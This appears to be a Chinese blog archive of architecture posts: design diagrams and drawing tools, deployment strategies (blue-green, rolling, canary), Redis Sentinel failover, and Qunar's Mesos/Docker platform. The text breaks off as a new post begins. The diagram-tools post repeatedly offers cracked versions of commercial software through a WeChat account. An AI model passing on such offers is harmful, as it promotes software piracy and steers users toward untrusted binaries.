Category Archives: 架构

想要做”架构师“，一定要会画设计图

三月 9, 2018架构架构师, 设计图dotte

什么是系统架构师？

系统架构师是一个既需要掌控整体又需要洞悉局部瓶颈并依据具体的业务场景给出解决方案的团队领导型人物。一个架构师得需要足够的想像力,能把各种目标需求进行不同维度的扩展，为目标客户提供更为全面的需求清单。

架构师在软件开发的整个过程中起着很重要的作用。

如何才能成为系统架构师？

1. 首先必须具有丰富的软件设计与开发经验，这有助于理解并解释所进行的设计是如何映射到实现中去。

2. 其次要具有领导能力与团队协作技能，软件架构师必须是一个得到承认的技术领导，能在关键时候对技术的选择作出及时、有效的决定。

3. 第三是具有很强的沟通能力，其实这一点好像什么角色都最好具备，软件架构师需要与各路人马经常打交道，客户、市场人员、开发人员、测试人员、项目经理、网络管理员、数据库工程师等等，而且在很多角色之间还要起沟通者的作用。

而设计图，它不是简单的供你欣赏，他其实是架构师，产品经理，开发工程师，测试工程师等各种角色之间进行沟通的语言，沟通的一个桥梁，让整个团队更能有效的协调工作。

设计图不单单是架构师要掌握的，在一个产品的开发过程中，任何一个环节，任何一个角色都可以通过掌握不同的设计图来完成沟通的。

流程图

流程是一系列的逻辑关系（包含因果关系、时间先后、必要条件、输入输出）产品经理做需求前一定要先把这些逻辑关系理清楚，如果非要用一句话概括的话“流程就是在特定的情境下满足用户特定需要的总结”。

图就是将你头脑中的逻辑关系以图形化的形式呈现出来，具有图形化、可视化的特点，因为是图，你可以像你的版本迭代一样，当你的逻辑需要修改的时候拿出来迭代一下，同时因为有图，你还可以更好的给项目成员进行宣讲。

产品中设计的流程图主要有三种，业务流程图、任务流程图、页面流程图，下面我们来一一介绍。

业务流程图

业务流程图又称为泳道图，就是描述那些个体在什么条件下做了什么事情，他们之间有何关联。主要分三个方面：

1. 涉及到哪些主体？

2. 每个主体都有哪些任务？

3. 各个主体之间怎么联系的？一般涉及到多个主体，每个主体之间有联系。

任务流程图

泳道图一般是从战略上分析整个业务流程，让你对公司所做的业务有个大概的了解，而任务流程图就是在你的产品操作上，用户通过什么样的操作来完成它的目标，比如你去银行ATM机器上取钱，你是如何一步步操作把钱取出来的。

页面流程图

如果说业务流程图帮助你梳理战略，任务流程图帮助你梳理用户操作行为（主要给程序员看）、页面跳转流程在帮助你梳理各个页面之间的跳转关系（主要给UI和前端程序员看）这是一个逐步从整体到局部，从后端到前端的过程。

所有的产品都是由页面组成的，不论是APP、PC、H5都是由一个个页面组成的，页面流程图描述完成一个任务需要经过哪些步骤，你在画图的时候只需要清晰的表现出用户点击页面的什么地方，然后跳转到那个页面。主要由页面、行动点、连接线组成。

UI设计图标注

对于APP的页面，UI设计师会给出UI设计标注图，这样APP客户端开发人员，直接按照标注图进行页面的开发了。

产品设计完成后，架构师需要对产品进行软件的架构设计。包括技术的选型，模块的划分，开发人员的任务分配，工作量的评估等等…..

系统架构设计图

构架将在一次又一次迭代中不断演化、改进、精炼。

序列图

架构师一般在做详细设计的时候，会把程序模块之间的每一步调用过程很详细的画出来，这样开发人员拿到设计文档，就能直接开发。

类图

设计图有很多种，还包括用例图，状态图，活动图…… 不再一一介绍。画什么样的设计图，不是绝对的，不同公司，不同项目，需要画的设计图也是不同的，有些项目需要画原型图，有些项目只是对外提供服务，没有页面也就不需要画原型图。另外还要根据项目的工期，预算等等因素考虑。如果一个项目的工期也就一个月甚至更短，那基本上就是怎么简单怎么快就怎么做。

画图工具

‘工欲善其事,必先利其器’，下面就为大家介绍几款常用设计图绘制工具。以下软件都可以在微信公众号，回复“设计”，获取破解版本。

Visio

是微软推出的一款流程图绘制工具，它有很多组件库，可以方便快捷的完成流程图、泳道图、结构图的绘制，但是不支持mac电脑。

OmniGraffle

Mac下没有Visio很多人就用这个，这个一般流程图都能绘制，但是效率感觉没有Visio高，优点就是画出来的图形比较美，同时支持外部插件，缺点就是没有比较好的泳道流程图插件，画起泳道图来不是太方便，但也可以画，可以自己组装泳道。

另外一个缺点是收费的，只能免费试用15天，不过我已经为大家准备好了一个最新的破解版本。

ProcessOn

是一款网页版的在线作图工具，优点是无需下载安装、破解这些破事，同时支持在线协作，可以多人同时对一个文件协作编辑，而且上手比较容易，它提供很多流程图模版，可以方便的画出流程图、思维导图、原型图、UML图，缺点就是在绘制泳道图需要增加泳道的时候，只能在最后一列加入，不能在中间加入这一点有点麻烦，还有要吐槽的就是由于是在线的，有时候导出图片，导出来的并不太好，流程图画的大的时候也无法截图。

在线地址：https://www.processon.com

Axure RP

这是一款产品经理经常用来画原型的工具，它可以在页面里定义各种按钮点击事件，进行页面的跳转，模拟提交的过程，所以非常方便使用。画人物流程图的时候也可以用，但是要画泳道图、UML图的时候，没有对应的模版，需要自己画，效率不高，如果你觉得画原型，制作文档都在Axure里，不想来回切换软件的画，可以在里面自己制作一个组件，下次直接调用。

Axure RP是可以画出这样效果的原型图

PxCook

一款还不错的标注工具.

优点：

1. 成熟：跨平台——支持Windows和Mac

2. 成熟2：支持PS和Sketch。

3. 交互特别智能，也方便，一拖一放就标注完了。

4. 相当需要说的一点：对于PSD文件或者Sketch进行了修改之后，PxCook里的标注会自动进行更新，免除了手动操作的过程。这是后面很多软件没有的。

5. 支持移动设备的多单位切换。

缺点：

1. 不能支持多个文件同时进行标注。

2. 对于图层样式等信息，不能进行详细查看。

iThoughtsX

一款优秀的思维导图工具

OmniPlan

最NB的项目管理流程软件，OmniPlan旨在帮助您可视化，维护和简化您的项目。分解任务，优化所需的资源，控制成本，并监控您的整个计划，都一目了然。协作与您的同事和分享每一个细节，更新日历与你的天关，或混搭。接受和拒绝一次过改变一个接一个或所有。

OmniPlan提供了像甘特图，时间表，摘要，里程碑和关键路径的功能突出显示，让您管理您的所有活动。从自定义的视图来快速输入数据， OmniPlan帮助您管理，因为你需要他们，简单或复杂的项目是 – 不需要复杂。

以上软件都可以在微信公众号，回复“设计”，获取破解版本。

微服务部署：蓝绿部署、滚动部署、灰度发布等部署方案对比与总结

九月 25, 2017分布式, 架构滚动部署, 灰度发布, 蓝绿部署dotte

在项目迭代的过程中，不可避免需要”上线“。上线对应着部署，或者重新部署；部署对应着修改；修改则意味着风险。

目前有很多用于部署的技术，有的简单，有的复杂；有的得停机，有的不需要停机即可完成部署。本文笔者简单讨论一下目前比较流行的几种部署方案，或者说策略。如有不足之处请指出，如有谬误，请指正^_^。

Blue/Green Deployment（蓝绿部署）

蓝绿部署无需停机，并且风险较小。

(1) 部署版本1的应用（一开始的状态）

所有外部请求的流量都打到这个版本上。

(2) 部署版本2的应用

版本2的代码与版本1不同(新功能、Bug修复等)。

(3) 将流量从版本1切换到版本2。

(4) 如版本2测试正常，就删除版本1正在使用的资源（例如实例），从此正式用版本2。

从过程不难发现，在部署的过程中，我们的应用始终在线。并且，新版本上线的过程中，并没有修改老版本的任何内容，在部署期间，老版本的状态不受影响。这样风险很小，并且，只要老版本的资源不被删除，理论上，我们可以在任何时间回滚到老版本。

rolling update（滚动发布）

滚动发布，一般是取出一个或者多个服务器停止服务，执行更新，并重新将其投入使用。周而复始，直到集群中所有的实例都更新成新版本。

这种部署方式相对于蓝绿部署，更加节约资源——它不需要运行两个集群、两倍的实例数。我们可以部分部署，例如每次只取出集群的20%进行升级。

这种方式也有很多缺点，例如：

(1) 没有一个确定OK的环境。使用蓝绿部署，我们能够清晰地知道老版本是OK的，而使用滚动发布，我们无法确定。

(2) 修改了现有的环境。

(3) 如果需要回滚，很困难。举个例子，在某一次发布中，我们需要更新100个实例，每次更新10个实例，每次部署需要5分钟。当滚动发布到第80个实例时，发现了问题，需要回滚。此时，脾气不好的程序猿很可能想掀桌子，因为回滚是一个痛苦，并且漫长的过程。

(4) 有的时候，我们还可能对系统进行动态伸缩，如果部署期间，系统自动扩容/缩容了，我们还需判断到底哪个节点使用的是哪个代码。尽管有一些自动化的运维工具，但是依然令人心惊胆战。

并不是说滚动发布不好，滚动发布也有它非常合适的场景。

灰度发布/金丝雀部署

先贴个百度百科：
灰度发布是指在黑与白之间，能够平滑过渡的一种发布方式。AB test就是一种灰度发布方式，让一部分用户继续用A，一部分用户开始用B，如果用户对B没有什么反对意见，那么逐步扩大范围，把所有用户都迁移到B上面来。灰度发布可以保证整体系统的稳定，在初始灰度的时候就可以发现、调整问题，以保证其影响度。
很多人把灰度发布与蓝绿部署混为一谈，笔者认为，与灰度发布最类似的应该是金丝雀部署。

“金丝雀部署”是增量发布的一种类型，它的执行方式是在原有软件生产版本可用的情况下，同时部署一个新的版本。同时运行同一个软件产品的多个版本需要软件针对配置和完美自动化部署进行特别设计。

我们来看一下金丝雀部署的步骤：

(1) 准备好部署各个阶段的工件，包括：构建工件，测试脚本，配置文件和部署清单文件。

(2) 从负载均衡列表中移除掉“金丝雀”服务器。

(3) 升级“金丝雀”应用（排掉原有流量并进行部署）。

(4) 对应用进行自动化测试。

(5) 将“金丝雀”服务器重新添加到负载均衡列表中（连通性和健康检查）。

(6) 如果“金丝雀”在线使用测试成功，升级剩余的其他服务器。（否则就回滚）

灰度发布中，常常按照用户设置路由权重，例如90%的用户维持使用老版本，10%的用户尝鲜新版本。不同版本应用共存，经常与A/B测试一起使用，用于测试选择多种方案。灰度发布比较典型的例子，是阿里云那个“新版本”，点击“进入新版本”，我们就成了金丝雀。

趣闻：金丝雀部署（同理还有金丝雀测试），“金丝雀”的由来：17世纪，英国矿井工人发现，金丝雀对瓦斯这种气体十分敏感。空气中哪怕有极其微量的瓦斯，金丝雀也会停止歌唱；而当瓦斯含量超过一定限度时，虽然鲁钝的人类毫无察觉，金丝雀却早已毒发身亡。当时在采矿设备相对简陋的条件下，工人们每次下井都会带上一只金丝雀作为“瓦斯检测指标”，以便在危险状况下紧急撤离。

总结

(1) 蓝绿部署：不停止老版本，额外搞一套新版本，等测试发现新版本OK后，删除老版本。

(2) 滚动发布：按批次停止老版本实例，启动新版本实例。

(3) 灰度发布/金丝雀部署：不停止老版本，额外搞一套新版本，常常按照用户设置路由权重，例如90%的用户维持使用老版本，10%的用户尝鲜新版本。不同版本应用共存，经常与A/B测试一起使用，用于测试选择多种方案。

参考文档

(1) 《Blue-green Deployments, A/B Testing, and Canary Releases》（有图文说明，必看）：http://blog.christianposta.com/deploy/blue-green-deployments-a-b-testing-and-canary-releases/

(2) Martin Fowler《BlueGreenDeployment》（必看）：https://martinfowler.com/bliki/BlueGreenDeployment.html

(3) 《在生产中使用金丝雀部署来进行测试》：http://www.infoq.com/cn/news/2013/03/canary-release-improve-quality

(4) 《Using Blue-Green Deployment to Reduce Downtime and Risk（使用烂蓝绿部署降降低停机时间与风险，基于CloudFoundry）》：http://docs.cloudfoundry.org/devguide/deploy-apps/blue-green.html

(5) 《marathon：Blue-Green Deployment》：https://mesosphere.github.io/marathon/docs/blue-green-deploy.html ，译文：http://blog.csdn.net/zhuchuangang/article/details/51064974 。

(6) 《微服务不是免费的午餐》：http://blog.csdn.net/phodal/article/details/27098005

(7) 《蓝绿发布的整个部署过程》：http://www.tuicool.com/articles/2Iji2ue

本文链接： http://www.itmuch.com/work/microservice-deploy/
版权声明： 本博客由周立创作，采用 CC BY 3.0 CN 许可协议。可自由转载、引用，但需署名作者且注明文章出处。如转载至微信公众号，请在文末添加作者公众号二维码。

Redis 备份、容灾及高可用实战

九月 15, 2017架构Redisdotte

一、Redis简单介绍

Redis是一个高性能的key-value非关系型数据库，由于其具有高性能的特性，支持高可用、持久化、多种数据结构、集群等，使其脱颖而出，成为常用的非关系型数据库。

此外，Redis的使用场景也比较多。

会话缓存（Session Cache）
Redis缓存会话有非常好的优势，因为Redis提供持久化，在需要长时间保持会话的应用场景中，如购物车场景这样的场景中能提供很好的长会话支持，能给用户提供很好的购物体验。
全页缓存
在WordPress中，Pantheon提供了一个不错的插件wp-redis，这个插件能以最快的速度加载你曾经浏览过的页面。
队列
Reids提供list和set操作，这使得Redis能作为一个很好的消息队列平台来使用。我们常通过Reids的队列功能做购买限制。比如到节假日或者推广期间，进行一些活动，对用户购买行为进行限制，限制今天只能购买几次商品或者一段时间内只能购买一次。也比较适合适用。
排名
Redis在内存中对数字进行递增或递减的操作实现得非常好。所以我们在很多排名的场景中会应用Redis来进行，比如小说网站对小说进行排名，根据排名，将排名靠前的小说推荐给用户。
发布/订阅
Redis提供发布和订阅功能，发布和订阅的场景很多，比如我们可以基于发布和订阅的脚本触发器，实现用Redis的发布和订阅功能建立起来的聊天系统。

此外还有很多其它场景，Redis都表现的不错。

二、Redis使用中单点故障问题

正是由于Redis具备多种优良特新，且应用场景非常丰富，以至于Redis在各个公司都有它存在的身影。那么随之而来的问题和风险也就来了。Redis虽然应用场景丰富，但部分公司在实践Redis应用的时候还是相对保守使用单节点部署，那为日后的维护带来了安全风险。

在2015年的时候，曾处理过一个因为单点故障原因导致的业务中断问题。当时的Redis都未采用分布式部署，采用单实例部署，并未考虑容灾方面的问题。

当时我们通过Redis服务器做用户购买优惠商品的行为控制，但后来由于未知原因Redis节点的服务器宕机了，导致我们无法对用户购买行为进行控制，造成了用户能够在一段时间内多次购买优惠商品的行为。

这种宕机事故可以说已经对公司造成了不可挽回的损失了，安全风险问题非常严重，作为当时运维这个系统的我来说有必要对这个问题进行修复和在架构上的改进。于是我开始了解决非分布式应用下Redis单点故障方面的研究学习。

三、非分布式场景下Redis应用的备份与容灾

Redis主从复制现在应该是很普遍了。常用的主从复制架构有如下两种架构方案。

常用Redis主从复制

方案一

Redis 这是最常见的一种架构，一个Master节点，两个Slave节点。客户端写数据的时候是写Master节点，读的时候，是读取两个Slave，这样实现读的扩展，减轻了Master节点读负载。

方案二

Maste

这种架构同样是一个Master和两个Slave。不同的是Master和Slave1使用keepalived进行VIP转移。Client连接Master的时候是通过VIP进行连接的。避免了方案一IP更改的情况。

Redis主从复制优点与不足

优点

实现了对master数据的备份，一旦master出现故障，slave节点可以提升为新的master，顶替旧的master继续提供服务
实现读扩展。使用主从复制架构，一般都是为了实现读扩展。Master主要实现写功能， Slave实现读的功能

不足
架构方案一
当Master出现故障时，Client就与Master端断开连接，无法实现写功能，同时Slave也无法从Master进行复制。

此时需要经过如下操作(假设提升Slave1为Master):

在Slave1上执slaveof no one命令提升Slave1为新的Master节点。
在Slave1上配置为可写，这是因为大多数情况下，都将slave配置只读。
告诉Client端(也就是连接Redis的程序)新的Master节点的连接地址。
配置Slave2从新的Master进行数据复制。

架构方案二
当master出现故障后，Client可以连接到Slave1上进行数据操作，但是Slave1就成了一个单点，就出现了经常要避免的单点故障(single point of failure)。

之后需要经过如下操作：

在Slave1上执行slaveof no one命令提升Slave1为新的Master节点
在Slave1上配置为可写，这是因为大多数情况下，都将Slave配置只读
配置Slave2从新的Master进行数据复制

可以发现，无论是哪种架构方案都需要人工干预来进行故障转移(failover)。需要人工干预就增加了运维工作量，同时也对业务造成了巨大影响。这时候可以使用Redis的高可用方案-Sentinel

四、Redis Sentinel介绍

Redis Sentinel为Redis提供了高可用方案。从实践方面来说，使用Redis Sentinel可以创建一个无需人为干预就可以预防某些故障的Redis环境。
Redis Sentinel设计为分布式的架构，运行多个Sentinel进程来共同合作的。运行多个Sentinel进程合作，当多个Sentinel同一给定的master无法再继续提供服务，就会执行故障检测，这会降低误报的可能性。

五、Redis Sentinel功能

Redis Sentinel在Redis高可用方案中主要作用有如下功能：

监控
Sentinel会不断的检查master和slave是否像预期那样正常运行
通知
通过API，Sentinel能够通知系统管理员、程序监控的Redis实例出现了故障
自动故障转移
如果master不像预想中那样正常运行，Sentinel可以启动故障转移过程，其中的一个slave会提成为master，其它slave会重新配置来使用新的master，使用Redis服务的应用程序，当连接时，也会被通知使用新的地址。
配置提供者
Sentinel可以做为客户端服务发现的认证源：客户端连接Sentinel来获取目前负责给定服务的Redis master地址。如果发生故障转移，Sentinel会报告新的地址。

六、Redis Sentinel架构

Redis

七、Redis Sentinel实现原理

Sentinel集群对自身和Redis主从复制进行监控。当发现Master节点出现故障时，会经过如下步骤：

1）Sentinel之间进行选举，选举出一个leader，由选举出的leader进行failover
2）Sentinel leader选取slave节点中的一个slave作为新的Master节点。对slave选举需要对slave进行选举的方法如下：a) 与master断开时间
如果与master断开的时间超过down-after-milliseconds(sentinel配置） * 10秒加上从sentinel判定master不可用到sentinel开始执行故障转移之间的时间，就认为该slave不适合提升为master。b) slave优先级
每个slave都有优先级，保存在redis.conf配置文件里。如果优先级相同，则继续进行。c) 复制偏移位置
复制偏移纪录着从master复制数据复制到哪里，复制偏移越大表明从master接受的数据越多，如果复制偏移量也一样，继续进行选举

d) Run ID
选举具有最小Run ID的Slave作为新的Master
流程图如下：

3) Sentinel leader会在上一步选举的新master上执行slaveof no one操作，将其提升为master节点
4）Sentinel leader向其它slave发送命令，让剩余的slave成为新的master节点的slave
5）Sentinel leader会让原来的master降级为slave，当恢复正常工作，Sentinel leader会发送命令让其从新的master进行复制
以上failover操作均有sentinel自己独自完成，完全无需人工干预。

总结

使用sentinel实现了Redis的高可用，当master出现故障时，完全无需人工干预即可实现故障转移。避免了对业务的影响，提高了运维工作效率。
在部署sentinel的时候，建议使用奇数个sentinel节点，最少三个sentinel节点。

写在最后

由于sentinel知识点比较多，这里仅给大家进行介绍，让大家有个了解，想了解更多可与我联系。谢谢。

from:http://www.yunweipai.com/archives/22663.html

去哪儿网基于Mesos和Docker构建私有云服务的实践

九月 15, 2017云计算, 架构docker, Mesos, 去哪儿网, 私有云dotte

作者：徐磊

【导读】本文深入介绍了去哪儿网利用Mesos和Docker构建私有云服务的全过程，分享了从无状态应用向有状态应用逐步过度的经验与心得。

平台概览

2014年下半年左右，去哪儿完成了有关构建私有云服务的技术调研，并最终拍定了Docker/Mesos这一方案。下图1展示了去哪儿数据平台的整体架构：

图1：去哪儿数据平台的整体架构

该平台目前已实现了如下多项功能：

每天处理约340亿/25TB的数据；
90%的数据在100ms内完成处理；
最长3h/24h的数据回放；
私有的Elasticsearch Cloud；
自动化监控与报警。

为什么选择Docker/Mesos

目前为止，这个数据平台可以说是公司整个流数据的主要出入口，包括私有的Elasticsearch Cloud和监控报警之类的数据。那么为什么选择Docker/Mesos？

选择Docker有两大原因。第一个是打包：对于运维来讲，业务打完包之后，每天面对的是用脚本分发到机器上时所出现的各种问题。业务包是一个比较上层的话题，这里不做深入的讨论，这里讲的“打包”指软件的Runtime层。如果用Docker的打包机制，把最容易出现问题的Runtime包装成镜像并放在registry里，需要的时候拿出来，那么整个平台最多只执行一个远程脚本就可以了，这是团队最看好的一个特性。第二个是运维：Docker取消了依赖限制，只要构建一个虚拟环境或一个Runtime的镜像，就可以直接拉取到服务器上并启动相应的程序。此外Docker在清理上也较为简单，不需要考虑环境卸载不干净等问题。

以常见的计算框架来说，它们本质上仍然属于运行在其上的Job的Runtime。综合上述情况，团队选择针对Runtime去打包。

选择Mesos是因为它足够简单和稳定，而且拥有较成熟的调度框架。Mesos的简单体现在，与Kubernetes相比其所有功能都处于劣势，甚至会发现它本身都是不支持服务的，用户需要进行二次开发来满足实际要求，包括网络层。不过，这也恰好是它的强项。Mesos本身提供了很多SDN接口，或者是有模块加载机制，可以做自定义修改，平台定制功能比较强。所以用Mesos的方案，需要考虑团队是否可以Hold住整个开发过程。

从框架层面来看，Marathon可以支撑一部分长期运行的服务，Chronos则侧重于定时任务/批处理。

以下图2是Mesos的一个简单结构图：

图2：Mesos结构

数据平台的最终目标架构如下图3所示：

图3：平台目标

组件容器化与部署

组件的容器化分为JVM容器化和Mesos容器化。JVM容器化需要注意以下几方面：

潜在创建文件的配置都要注意

java.io.tmpdir
-XX:HeapDumpPath
-Xloggc

-Xloggc会记录GC的信息到制定的文件中。现在很少有直接用XLoggc配置的了（已经用MXBean方式替代了）。如果有比较老的程序是通过-Xloggc打印GC日志的话，那么要额外挂载volume到容器内。

时区与编码

–env TZ=Asia/Shanghai
–volume /etc/localtime:/etc/localtime:ro
–env JAVA_TOOL_OPTIONS=”-Dfile.encoding=UTF-8 -Duser.timezone=PRC

时区是另一个注意点。上面所列的三种不同的方法都可以达到目的，其中第一/三个可以写在Dockerfile里，也可以在docker run时通过–env传入。第二种只在docker run时通过volume方式挂载。另外，第三种额外设置了字符集编码，推荐使用此方式。

主动设置heap

防止ergonomics乱算内存

这是Docker内部实现的问题。即使给Docker设置内存，容器内通过free命令看到的内存和宿主机的内存是一样的。而JVM为了使用方便，会默认设置一个人机功能会根据当前机器的内存计算一个堆大小，如果我们不主动设置JVM堆内存的话，很有可能计算出一个超过　Memory Cgroup限制的内存，启动就宕掉，所以需要注意在启动时就把内存设置好。

CMS收集器要调整并行度

-XX:ParallelGCThreads=cpus
-XX:ConcGCThreads=cpus/2

CMS是常见的收集器，它设置并行度的时候是取机器的核数来计算的。如果给容器分配2个CPU，JVM仍然按照宿主机的核数初始化这些线程数量，GC的回收效率会降低。想规避这个问题有两点，第一点是挂载假的Proc文件系统，比如Lxcfs。第二种是使用类似Hyper的基于Hypervisor的容器。

Mesos容器化要求关注两类参数：配置参数和run参数。

需要关注的配置参数
- MESOS_systemd_enable_support
- MESOS_docker_mesos_image
- MESOS_docker_socket
- GLOG_max_log_size
- GLOG_stop_logging_if_full_disk

Mesos是配置参数最多的。在物理机上，Mesos默认使用系统的Systemd管理任务，如果把Mesos通过Docker run的方式启动起来，用户就要关systemd_Enable_support，防止Mesos Slave拉取容器运行时数据造成混乱。

第二个是Docker_Mesos_Image，这个配置告诉Mesos Slave，当前是运行在容器内的。在物理机环境下，Mesos Slave进程宕掉重启，、就会根据executor进程/容器的名字做recovery动作。但是在容器内，宕机后executor全部回收了，重启容器，Slave认为是一个新环境，跳过覆盖动作并自动下发任务，所以任务有可能会发重。

Docker_Socket会告诉Mesos，Docker指定的远端地址或本地文件，是默认挂到Mesos容器里的。用户如果直接执行文件，会导致文件错误，消息调取失败。这个时候推荐一个简单的办法：把当前物理机的目录挂到容器中并单独命名，相当于在容器内直接访问整个物理机的路径，再重新指定它的地址，这样每次一有变动Mesos就能够发现，做自己的指令。

后面两个是Mesos Logging配置，调整生成logging文件的一些行为。

需要关注的run参数
- –pid=host
- –privileged
- –net=host (optional)
- root user

启动Slave容器的时候最好不加Pid Namespace，因为容器内Pid=1的进程一般都是你的应用程序，易导致子进程都无法回收，或者采用tini一类的进程启动应用达到相同的目的。–privileged和root user主要是针对Mesos的持久化卷功能，否则无法mount到容器内，–net=host是出于网络效率的考虑，毕竟源生的bridge模式效率比较低。

图4：去哪儿数据平台部署流程图

上图4就是去哪儿数据平台部署的流程图。

基于Marathon的Streaming调度

拿Spark on Mesos记录子，即使是基于Spark的Marathon调度，也需要用户开发一个Frameworks。上生产需要很多代码，团队之前代码加到将近一千，用来专门解决Spark运行在Master中的问题，但是其中一个软件经常跑到Master，对每一个框架写重复性代码，而且内部逻辑很难复用，所以团队考虑把上层的东西全都跑在一个统一框架里，例如后面的运维和扩容，都针对这一个框架做就可以了。团队最终选择了Marathon，把Spark作为Marathon的一个任务发下去，让Spark在Marathon里做分发。

除去提供维标准化和自动化外，基于Spark的Marathon还可以解决Mesos-Dispatcher的一些问题：

配置不能正确同步；这一块更新频率特别慢，默认速度也很慢，所以需要自己来维护一个版本。第一个配置不能正确同步，需要设置一些参数信息、Spark内核核数及内损之类，这里它只会选择性地抽取部分配置发下去。
基于attributes的过滤功能缺失；对于现在的环境，所设置的Attributes过滤功能明显缺失，不管机器是否专用或有没有特殊配置，上来就发，很容易占满ES的机器。
按role/principal接入Mesos；针对不同的业务线做资源配比时，无法对应不同的角色去接入Mesos。
不能re-registery；框架本身不能重注册，如果框架跑到一半挂掉了，重启之后之前的任务就直接忽略不管，需要手工Kill掉这个框架。
不能动态扩容executor。最后是不能扩容、动态调整，临时改动的话只能重发任务。

整个过程比较简单，如下图5所示：

图5：替代Spark Mesos Dispatcher

不过还是有一些问题存在：

Checkpoint & Block

动态预留 & 持久化卷
setJars
清理无效的卷

关于Checkpoint&Block，通过动态预留的功能可以把这个任务直接“钉死”在这台机器上，如果它挂的话可以直接在原机器上重启，并挂载volume继续工作。如果不用它预留的话，可能调度到其他机器上，找不到数据Block，造成数据的丢失或者重复处理。

持久化卷是Mesos提供的功能，需要考虑它的数据永存，Mesos提供了一种方案：把本地磁盘升级成一个目录，把这个转移到Docker里。每次写数据到本地时，能直接通过持久化卷来维护，免去手工维护的成本。但它目前有一个问题，如果任务已被回收，它持久化卷的数据是不会自己删掉的，需要写一个脚本定时轮巡并对应删掉。

临时文件

java.io.tmpdir=/mnt/mesos/sandbox
spark.local.dir=/mnt/mesos/sandbox

如果使用持久化卷，需要修改这两个配置，把这一些临时文件写进去，比如shuffle文件等。如果配置持久化卷的话，用户也可以写持久化卷的路径。

Coarse-Grained

Spark有两种资源调度模式：细粒度和粗粒度。目前已经不太推荐细粒度了，考虑到细粒度会尽可能的把所有资源占满，容易导致Mesos资源被耗尽，所以这个时候更倾向选择粗粒度模式。

图6：Storm on Marathon

上图6展示了基于Storm的Marathon调度，Flink也是如此。结合线上的运维和debug，需要注意以下几方面：

源生Web Console

随机端口
OpenResty配合泛域名
默认源生Web Console，前端配置转发，直接访问固定域名。

Filebeat + Kafka + ELK

多版本追溯
日常排错
异常监控

大部分WebUI上看到的都是目前内部的数据处理情况，可以通过ELK查询信息。如果任务曾经运行在不同版本的Spark上，可以把多版本的日志都追踪起来，包括日常、问题监控等，直接拿来使用。

Metrics

第三个需要注意的就是指标。比如Spark ，需要配合Metrics把数据源打出来就行。

ELK on Mesos

目前平台已有近50个集群，约100TB+业务数据量，高峰期1.2k QPS以及约110个节点，Elasticsearch需求逐步增多。

图7：ELK on Mesos

上图7是ELK on Mesos结构图，也是团队的无奈之选。因为Mesos还暂时不支持multi-role framework功能，所以选择了这种折中的方式来做。在一个Marathon里，根据业务线设置好Quota后，用业务线重新发一个新的Marathon接入进去。对于多租户来讲，可以利用Kubernetes做后续的资源管控和资源申请。

部署ES以后，有一个关于服务发现的问题，可以去注册一个callback，Marathon会返回信息，解析出master/slave进程所在的机器和端口，配合修改Haproxy做一层转发，相当于把后端整个TCP的连接都做一个通路。ES跟Spark不完全相同，Spark传输本身流量就比较大，而ES启动时需要主动联系Master地址，再通过Master获取相应集群，后面再做P2P，流量比较低，也不是一个长链接。

监控与运维

这部分包括了Streaming监控指标与报警、容器监控指标与报警两方面。

Streaming监控指标与报警

Streaming监控含拓扑监控和业务监控两部分。

Streaming拓扑监控
业务监控
- Kafka Topic Lag
- 处理延迟mean90/upper90
- Spark scheduler delay/process delay
- Search Count/Message Count
- Reject/Exception
- JVM

拓扑监控包括数据源和整个拓扑流程，需要用户自己去整理和构建，更新的时候就能够知道这个东西依赖谁、是否依赖线上服务，如果中途停的话会造成机器故障。业务监控的话，第一个就是Topic Lag，Topic Lag每一个波动都是不一样的，用这种方式监控会频繁报警，90%的中位数都是落在80—100毫秒范围内，就可以监控到整个范围。

容器监控指标与报警

容器监控上关注以下三方面：

Google cAdvisor足够有效
- mount rootfs可能导致容器删除失败 #771
- –docker_only
- –docker_env_metadata_whitelist
Statsd + Watcher
- 基于Graphite的千万级指标监控平台
Nagios

容器这一块比较简单，利用Docker并配合Mesos，再把Marathon的ID抓取出来就可以了。我们这边在实践的过程发现一个问题，因为Statsd Watcher容易出现问题，你直接用Docker的时候它会报一些错误出来，这个问题就是Statsd Watcher把路径给挂了的原因。目前我们平台就曾遇到过一次，社区里面也有人曝，不过复现率比较低。用的时候如果发现这个问题把Statsd Watcher直接停掉就好。指标的话，每台机器上放一个statsd再发一个后台的Worker，报警平台也是这个。

其实针对Docker监控的话，还是存在着一些问题：

基础监控压力
- 数据膨胀
- 垃圾指标增多
- 大量的通配符导致数据库压力较高
单个任务的容器生命周期
- 发布
- 扩容
- 异常退出

首先主要是监控系统压力比较大。原来监控虚拟机时都是针对每一个虚拟机的，只要虚拟机不删的话是长期汇报，指标名固定，但在容器中这个东西一直在变，它在这套体系下用指标并在本地之外建一个目录存文件，所以在这种存储机制下去存容器的指标不合适。主要问题是数据膨胀比较厉害，可能一个容器会起名，起名多次之后，在Graphite那边对应了有十多个指标，像这种都是预生成的监控文件。比如说定义每一秒钟一个数据点，要保存一年，这个时候它就会根据每年有多少秒生成一个RRD文件放那儿。这部分指标如果按照现有标准的话，可能容器的生命周期仅有几天时间，不适用这种机制。测试相同的指标量，公司存储的方式相对来说比Graphite好一点。因为Graphite是基于文件系统来做的，第一个优化指标名，目录要转存到数据库里做一些索引加速和查询，但是因为容器这边相对通配符比较多，不能直接得知具体对应的ID，只能通配符查询做聚合。因为长期的通配符在字符串的索引上还是易于使用的，所以现在算是折中的做法，把一些常用的查询结果、目录放到里边。

另一个是容器的生命周期。可以做一些审计或者变更的版本，在Mesos层面基于Marathon去监控，发现这些状态后打上标记：当前是哪一个容器或者哪一个TASK出了问题，对应扩容和记录下来。还有Docker自己的问题，这样后面做整个记录时会有一份相对比较完整的TASK-ID。

End.

转载请注明来自36大数据（36dsj.com)：36大数据 » 去哪儿网基于Mesos和Docker构建私有云服务的实践

如何打造一个日均PV千万级别的大型系统？

九月 15, 2017架构架构dotte

作者介绍

周金桥，具有丰富的系统规划、设计、开发、运维及团队组织管理工作经验，熟悉.Net、J2EE技术架构及应用。微软2008-2012五届最有价值专家(MVP)，2009年单独著有《ASP.NET夜话》一书，2010年与人合著《程序员的成长之路》。至今活跃在多个技术社区。

本文我选定的方向是如何开发一个大型系统，在这里我对大型系统的定义为日均PV在千万级以上，而京东和淘宝这类则属于巨型系统了。因此在本篇中讲述的都是基于一些开源免费的技术实现，至于通过F5硬件加速、DNS来实现负载均衡、CDN加速等需要花钱购买的技术或者服务则不再本篇介绍范围之类。

一、从两个系统说起

1、某移动互联网公司服务器端架构图

上图是某移动互联网公司的服务器端架构图，它支撑了国内外数百万客户端的访问请求，有如下特点：

